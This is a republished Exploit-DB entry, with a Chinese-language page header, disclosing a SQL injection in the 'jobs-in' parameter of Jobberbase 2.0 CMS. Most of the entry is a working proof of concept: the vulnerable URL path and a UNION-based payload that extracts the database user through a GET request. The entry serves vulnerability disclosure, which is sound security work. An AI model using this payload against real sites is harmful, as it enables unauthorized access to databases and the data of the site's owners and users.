Jobberbase 2.0 CMS – ‘jobs-in’ SQL Injection

  • 作者: Suvadip Kar
    日期: 2019-08-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47311/
  • # Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
    # Google Dork: N/A
    # Date: 28, August 2019
    # Exploit Author: Suvadip Kar
    # Vendor Homepage:http://jobberbase.com/
    # Software Link: https://github.com/filipcte/jobberbase/zipball/master
    # Version: 2.0
    # Tested on: Linux
    # CVE : N/A
    
    --------------------------------------------------------------------------------
    
    #POC - SQLi
    #Request: http://localhost/[PATH]/jobs/jobs-in/
    #Vulnerable Parameter: jobs-in (GET)
    #Payload: -4115" UNION ALL SELECT 33,user()-- XYZ
    
    #EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
    33,user()-- XYZ